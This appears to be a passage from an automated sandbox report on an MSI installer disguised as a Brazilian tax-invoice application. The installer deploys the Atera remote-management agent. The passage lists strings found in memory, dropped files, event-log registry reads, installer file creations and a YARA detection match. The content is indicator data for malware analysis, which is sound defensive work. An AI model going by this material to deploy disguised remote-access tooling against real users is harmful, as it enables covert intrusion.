                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/30.3/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/30.3/AgentPackageOsUpdates.zip?0YJRFk/
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.7/AgentPackageProgramManage
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip?0YJRFk/JQ
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.12/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.12/AgentPackageSystemTools.zip?0Y
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.3/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.3/AgentPackageTicketing.zip?0YJRFk/
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4284E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://ps.atera.com/installers/Agents/Mac/
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://ps.atera.com/installers/Agents/Windows/
                                Source: AgentPackageTicketing.exe, 0000002C.00000002.3063046700.000002140007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgX
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2019302027.000002EF73BC2000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42D29000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42D29000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=17da5852-f989-44bc-b44d-76379b8f82c1
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=1a7f0a96-6cc5-4ebb-9ff5-3167722267eb
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2252d76e-40dc-4fde-8a4e-93e2cb6baeac
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9b97c88b-00f9-4ad4-acca-b3179ff49e5e
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ae41f17c-0e47-4ac8-b86c-d99af8cebe36
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b0a02166-da11-4e5e-9bd0-e30e8bdfd576
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b1032fc2-4256-41bd-80b8-b976c513c924
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3da8718-647d-4170-800b-e0be5a02ff6d
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/52187e48
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscrib
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/52187e48-563c-468d-9785
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.comrent
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.github.com/sebnilsson/ChocolateyPackages/master/SmartGit/logo.png
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/JetBrains/Chocolatey/master/TeamCityAddin/logo.png
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/asciidoctor/asciidoctorj/main/LICENSE.txt
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/johanjanssen/AdoptOpenJDKChocolateyPackages/master/AdoptOpenJDK/Ad
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/ic
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rawcdn.githack.com/johanjanssen/AdoptOpenJDKChocolateyPackages/301e926794e98de48f9c9f3a32b18
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/flywaydb/flyway-commandline/10.21.0/flyway-commandline-10.21.0-wi
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.maven.org/remotecontent?filepath=org/asciidoctor/asciidoctorj/2.5.13/asciidoctorj-2.5
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://system.data.sqlite.org/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2129883907.000001F735F74000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://system.data.sqlite.org/X
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://teamcity-support.jetbrains.com/hc/en-us/community/topics
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://urn.to/r/sds_see
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wiki.openjdk.java.net/display/JDKUpdates/JDK11u
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/help/teamcity/2024.12/teamcity-2024-12-release-notes.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/buy/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/buy/IsLa
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/documentation/
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2125875531.000001F735E48000.00000002.00000001.01000000.00000024.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/technetwork/java/javase/8all-relnotes-2226344.html
                                Source: AgentPackageMonitoring.exeString found in binary or memory: https://www.sqlite.org/copyright.html
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2168030863.00007FFDEE584000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtrack.jetbrains.com/issues/TW
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Reads the Security eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Reads the System eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: 35.2.AgentPackageMonitoring.exe.1f71cd60000.1.unpack, type: UNPACKEDPEMatched rule: yara_runascs Author: Sekoia.io
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\692c41.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2D79.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2FBD.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FBB.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI41D0.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI41D1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI422F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI432A.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\692c43.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\692c43.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56F2.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\692c44.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5085.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5885.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9409.tmpJump to behavior
